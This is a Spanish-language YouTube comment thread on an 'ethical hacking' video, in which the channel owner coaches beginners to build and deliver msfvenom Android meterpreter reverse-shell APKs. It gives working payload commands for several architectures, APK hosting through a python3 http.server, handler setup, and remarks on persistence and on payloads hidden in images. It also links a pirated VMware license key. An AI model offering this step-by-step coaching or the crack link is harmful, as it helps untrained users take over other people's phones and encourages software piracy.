📱HACKING ÉTICO - MSFVENOM Android desde KaliLinux

Поделиться
HTML-код

Комментарии • 85

  • @sebastianpenav.9092
    @sebastianpenav.9092 9 дней назад +1

    hola tengo una duda y es que soy nuevo en el tema de cibersecurity y pues no se como solucionarlo y es que no me deja pasar la apk al escritorio y estaba intentando pasarla asi (msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 -o /home/kali/Desktop/virus.apk) pero me dice que no encuentra el archivo o el directorio

    • @Hacking_Community
      @Hacking_Community  9 дней назад +1

      Eso significa que la ruta no es válida, por qué no encuentra el archivo, como si no existiera

  • @EduardoMedina-f1g
    @EduardoMedina-f1g Месяц назад +3

    buenas noches, una consulta cuando ya creo la apk y la instalo en el dispositivo me dice que la version del android es antigua y no conecta con kali linux, como puedo hacerpara que sea compatible?

    • @Hacking_Community
      @Hacking_Community  Месяц назад +1

      Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.

    • @Hacking_Community
      @Hacking_Community  Месяц назад +1

      Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.

    • @EduardoMedina-f1g
      @EduardoMedina-f1g Месяц назад +1

      @@Hacking_Community me puedes recomendar algun exploit? de todas formas voy a intentar nuevamente

    • @Hacking_Community
      @Hacking_Community  Месяц назад +1

      @@EduardoMedina-f1g Pues a ver puede ser que sea tambien por la arquitectura que tenga el móvil, te puedo dar unos cuantos comandos a probar si fuera de la arquitectura, por que el payload utilizado deberia de ser compatible con cualquier version de android:
      msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm
      msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm64
      msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86
      msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86_64
      A ver si con esto te puede ser de ayuda, me vas diciendo.

    • @EduardoMedina-f1g
      @EduardoMedina-f1g Месяц назад +1

      @@Hacking_Community hola con estos exploit me da un error de compatibilidad payload

  • @Henry-ur3kg
    @Henry-ur3kg 5 месяцев назад +1

    Lo explicas bien, da gusto 👍

    • @Hacking_Community
      @Hacking_Community  5 месяцев назад +1

      Graciasss jeje, me alegro muchísimo 🫶🏻

  • @johanstivenhiguera2516
    @johanstivenhiguera2516 5 месяцев назад +1

    Excelente saludos, una inquietud también es posible escalar privilegio en estos dispositivos.

    • @Hacking_Community
      @Hacking_Community  5 месяцев назад +2

      Pues de Android en ese entorno me pillas flojo, pero se puede si tiene por así decirlo la opción activada del usuario "admin" o "root" que explico en el vídeo, una vez que la tiene activada se que se puede escalar, pero tendría que investigar eso jaja

  • @anonimusking6822
    @anonimusking6822 3 месяца назад +2

    Una pregunta cuando abro la app en mi celular me dice que esa app fue hecha para una versión anterior de android, mi android es version 10 como lo hago para que cuando este creando el apk en kali linux lo haga para la version 10 de android?

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +1

      Para que funcione en versiones más modernas en móviles se tiene que utilizar otro tipo de herramientas para que funcione mejor, no sé si habrá algún exploit en el que soporte android 10 puede ser que lo haya, pero es lo que digo para esas cosas es mejor utilizar herramientas más sofisticadas jaja

    • @anonimusking6822
      @anonimusking6822 3 месяца назад +1

      @@Hacking_Community como cual me recomiendas bro?

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +1

      ​@@anonimusking6822 A ver con la propia herramienta de metasploit se puede hacer, utilizando otro payload o alguno que soporte android 10 o 13, de otras herramientas no te sabría decir, se que las hay, pero no sé cuáles, aún así utilizo un android antiguo para no meterme en problemas legales de vulnerar un android más moderno, me entiendes?? Jaja

  • @MaykelMillan-dk4tm
    @MaykelMillan-dk4tm 2 месяца назад +1

    Buenos videos bro, yo tengo un problema pero no se si es la red, cuando pongo el metasploit a escuchar que le doy a la apk en el cell no hace nada

    • @MaykelMillan-dk4tm
      @MaykelMillan-dk4tm 2 месяца назад +1

      Ayudame bro , a se me olvido decir que uso linux en wsl2

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      ​@@MaykelMillan-dk4tm pues a ver pueden ser muchas cosas, que a lo mejor la IP o el puerto no esté bien configurado de msfvenom, revisa el adaptador de red que esté en modo puente y que coja la red del wifi (wlan), revisa que la configuración del multi handler este con la IP y puerto iguales qje con msfvenom.

  • @oscargonzalezherrera2613
    @oscargonzalezherrera2613 3 месяца назад +1

    eso ya no funciona lo eh probado en varios dispositivos android y nunca se genera la sesion de meterpreter cuando ejecutas la app

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +3

      Comprueba que lo estás haciendo bien, por qué sigue funcionando, sólo que en dispositivos más nuevos a lo mejor puede dar algún fallo, pero una reverse Shell es muy raro que falle sólo que tienes que meter una que se adapte al dispositivo

    • @anonimusanon-c3b
      @anonimusanon-c3b 2 месяца назад +1

      @@Hacking_Community lo probe recien con una tablet itab de android 9.0 y funciono (la tablet es de un amigo y tengo concentimieto)

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      ​@@anonimusanon-c3bSi es lo que dije, que dependiendo se puede o a veces da fallos, pero como verás se puede en la mayoría de dispositivos, tengo un vídeo más nuevo hablando de esto pero en ordenadores y de forma más profesional jaja

  • @iradama3451
    @iradama3451 2 месяца назад +1

    Hola, estoy intentando acceder a los list files y no me aparece nada, podrias ayudarme con eso?

    • @iradama3451
      @iradama3451 2 месяца назад +1

      pongo ls y solo me aparece "oat"

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      @@iradama3451 Por que a lo mejor no estan almacenados ahi los archvos de tu dispositivo, pero dentro de ese entorno puede crear carpetas y mover los archivos a ese entorno, que es lo que hacia yo.
      Solo que es depende del movil tambien te digo.

    • @iradama3451
      @iradama3451 2 месяца назад +1

      @@Hacking_Community no entiendo muy bien como hacerlo...

    • @iradama3451
      @iradama3451 2 месяца назад +1

      @@Hacking_Community me puedes enseñar por favor

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      ​@@iradama3451Yo encantado, sólo que es lo que digo, que es depende del móvil, tienes que estar explorando con la terminal el móvil entero desde la Shell remota hasta que encuentres la carpeta en la que estén todas las cosas del móvil, ojalá poder decirte dónde pero es muy depende del móvil y tampoco estoy muy especializado en móviles 🥲

  • @Nico-bb3dc
    @Nico-bb3dc 3 месяца назад +1

    Hola muy buen video, tengo un problema y es que cuando pongo la ip en google no me carga la página para poder descargar el archivo, mi ip es 10.0.2.15, uso virtualbox tiene algo que ver?

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +2

      Sería raro que fuera de virtual box, pero si es verdad que si pasa eso es por qué alguna configuración de red no está bien, si te vas a la máquina kali o la que utilice y le configuras como adaptador puente (modo Bridge) te utilizará la dirección de red física de tu ordenador host, y así poder interconectarlos cuando metas la IP

    • @Nico-bb3dc
      @Nico-bb3dc 3 месяца назад +1

      ​@@Hacking_Communityvale muchas gracias ya eh podido solucionarlo, una duda cuando poner en escucha y utilizo el msf6 > use exploit/multi/handler me pone que no encuentra el comando,lo siento por tantas dudas pero es que soy nuevo😅

    • @NCIRECORDS
      @NCIRECORDS 3 месяца назад +1

      Oye bro​@@Hacking_Community un video para ofuscar el payload estaria de aquellas, saludos buen tutorial

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +1

      ​@@Nico-bb3dc Tranquilo por las preguntas no te preocupes, te entiendo jaja, pues si me puedes decir exactamente el error te podría decir de dónde viene, igualmente mira bien que lo estés poniendo todo correctamente, asegúrate de que estar realmente dentro de msfconsole y demás cosas, pero envíame el error y te ayudo jeje.
      Igualmente si a veces tienes problemas como estos yo lo que suelo hacer es investigar el error en internet o a veces preguntárselo a ChatGPT, que eso también ayuda a desarrollarte mucho en este mundo.

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +2

      ​@@NCIRECORDSsi se podría hacer, lo miraré bien y si puedo subo un vídeo respecto a ello 🤙🏻

  • @Nico-bb3dc
    @Nico-bb3dc 4 месяца назад +1

    Hola bro, tu que kali linux usas? Lo digo porque soy nuevo en esto y a la hora de descargarmelo me salen varias opciones, me sale el installer images, virtual machines...

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +2

      Pues si es verdad que aparecen unas cuantas, si no te quieres instalar Kali desde 0 con una ISO, te recomiendo que te descargues los que están preparados para una máquina virtual que son más rápidos, ya que el sistema ya está montado y sólo tienes que abrirlo con el hipervisor:
      www.kali.org/get-kali/#kali-virtual-machines
      Ahí te facilito lo que te comento jeje y a darle duro que por algo se empieza

    • @Nico-bb3dc
      @Nico-bb3dc 4 месяца назад +1

      @@Hacking_Community Muchas gracias

    • @Nico-bb3dc
      @Nico-bb3dc 4 месяца назад +1

      Y de esas cual me recomiendas? La que más suelo ver es la de virtualbox

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +2

      ​@@Nico-bb3dc Te recomiendo VMWare, si quieres descargarte la versión 17 pro y en un repositorio de GitHub hay una key para iniciarlo gratis con licencia (Crackearlo)
      gist.github.com/PurpleVibe32/30a802c3c8ec902e1487024cdea26251
      En ese respositorio la que pone (< worked for me!)

  • @alangarrido6393
    @alangarrido6393 20 дней назад

    Holaa, tengo una duda, si se desinstala el apk, el hacker ya no podría hacer nada mas no?

    • @Hacking_Community
      @Hacking_Community  20 дней назад +1

      Exacto, pero si ha creado una persistencia en los procesos, ya da igual que la desinstales o no, seguirá ahí aunque lo reinicies

  • @moscomoa5348
    @moscomoa5348 2 месяца назад +1

    amigo al hacerlo me sale esto
    Error: No such file or directory @ rb_sysopen - /home/kali/Desktop/Programa.apk
    no encuentra el directorio y cuando labro una terminal en Desktop sale lo mismo ... k podra ser??

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      Pues eso es un error de que no encuentra el archivo seleccionado, compruebalo con el comando:
      sudo ls -l /home/kali/Desktop/Programa.apk
      O si no está ahí, pues haz un find para buscarlo por el sistema:
      sudo find /home/kali -name "Programa.apk" 2>/dev/null
      o
      sudo find / -name "Programa.apk" 2>/dev/null
      Y ya si no es nada de esto, tendrías que mirar los permisos, por si acaso hazlo en una sesión de root, así te quitas problemas muchas veces

    • @moscomoa5348
      @moscomoa5348 2 месяца назад +1

      @@Hacking_Community muchas gracias lo he solucionado Gracias

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      @@moscomoa5348 Perfectoo, nadaa jeje

  • @lejendaryfortnite2058
    @lejendaryfortnite2058 4 месяца назад +1

    buen video pero no se ¿por que no me carga la pagina para instalar la apk ?

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +2

      No se a que te refieres exactamente pero asegurate de que cuando tienes el servidor de python3 abierto donde se encuentre la apk metas bien la IP con el puerto que corresponde y que sobre todo esten los dos dispositivos en la misma red wifi, poniendo la maquina victual en modo red puente

    • @lejendaryfortnite2058
      @lejendaryfortnite2058 4 месяца назад +1

      @@Hacking_Community si todo lo que mencionas bien,pero lo hare desde el principio todo

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +2

      @@lejendaryfortnite2058 Valee, pues cualquier cosa me dices y si te puedo ayudar en algo me comentas 🤙🏻

  • @luismejia4737
    @luismejia4737 4 месяца назад +1

    los dispositivos tienen que estar en la misma red oara que funcione? o da igual en que red

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +1

      Si te refieres a la comunicación de que se pueda abrir una Shell cuando se ejecute el apk, si, tienen que estar en la misma red wifi, se puede hacer en distintas redes también, pero eso es mucho más avanzado y tedioso jaja

    • @Tartarus_3
      @Tartarus_3 Месяц назад +1

      @@Hacking_Community puedes hacer un video haciendo eso? acceder de forma remota

    • @Hacking_Community
      @Hacking_Community  Месяц назад +1

      ​@@Tartarus_3es que eso ya roza un poco lo no ético y si hago algo así no sé considera estar en un entorno controlado, por lo que me tumbarian el vídeo lo más seguro jaja

    • @Tartarus_3
      @Tartarus_3 Месяц назад +1

      @@Hacking_Community entiendo pero no te lo tumban si en todo momento aclaras que estas haciendo un experimento para fines de aprendizaje, hay muchas cosas no eticas que las pesonas defienden hoy en dia con su vida, si bien lo que enseñas es un arma de doble filo, algunos no la usaremos con fines malignos.

    • @Hacking_Community
      @Hacking_Community  Месяц назад +1

      @@Tartarus_3 Yaa, la cosa es que ya me tumbaron un video y eso que estaba en todo momento diciendo que era para fines eticos

  • @tunsu06
    @tunsu06 5 месяцев назад +1

    sigue así maquina

  • @DanielLopez-vu1ki
    @DanielLopez-vu1ki 2 месяца назад +1

    Es igual para iphone IOS?

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      Hay que utilizar otros payloads, pero la técnica es similar jaja

    • @DanielLopez-vu1ki
      @DanielLopez-vu1ki 2 месяца назад +1

      @@Hacking_Community tienes videos vulnerando ios ?

    • @DanielLopez-vu1ki
      @DanielLopez-vu1ki 2 месяца назад +1

      @@Hacking_Community por cierto buen video.

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      ​@@DanielLopez-vu1ki Que va lo siento, es que no tengo igualmente ningún sistema operativo IOS por casa jaja

    • @Hacking_Community
      @Hacking_Community  2 месяца назад +1

      ​@@DanielLopez-vu1kigraciass jeje

  • @rodritroncozo
    @rodritroncozo 3 месяца назад +1

    una consulta, cuando pongo en el dispositivo android la direccion ip no me carga nada... alguna solucion?

    • @Hacking_Community
      @Hacking_Community  3 месяца назад +2

      Asegúrate de que el servidor de python3 está bien puesto y que la IP también está bien puesta con su determinado puerto 8000 en tal caso de que no indicaras el puerto en el servidor de python3, por ejemplo....
      $ python3 -m http.server
      URL = :8000/
      o sin meter puerto que sería...
      $ python3 -m http.server 80
      URL = /
      Y ya es asegurarte con un ifconfig que la IP está bien puesta y todo lo demás, espero que te haya servido de ayuda 🤙🏻

  • @nestorcharris6590
    @nestorcharris6590 4 месяца назад +1

    Buen video amigo, es verdad que por una imagen también pueden esconder el payload?
    Dicen que al abrir una imagen también se te puede colar un payload sin darte cuenta

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +2

      Si eso también se puede hacer, es algo muy parecido a lo que hago para hacerme una Reverse Shell al móvil cuando se habre la aplicación desde el móvil, pues lo mismo pero con una imagen solo que de una manera mas diferente jaja

    • @nestorcharris6590
      @nestorcharris6590 4 месяца назад +1

      @@Hacking_Community jejejeje uy entonces hay que tener cuidado hasta con las imágenes que nos mandan 🥶
      Gracias por tu conocimiento, ojalá puedas hacer un video explicándolo bro, saludos ✌🏽

    • @Hacking_Community
      @Hacking_Community  4 месяца назад +1

      ​@@nestorcharris6590 sii ya intentaré hacer algún vídeo explicando eso mejor jeje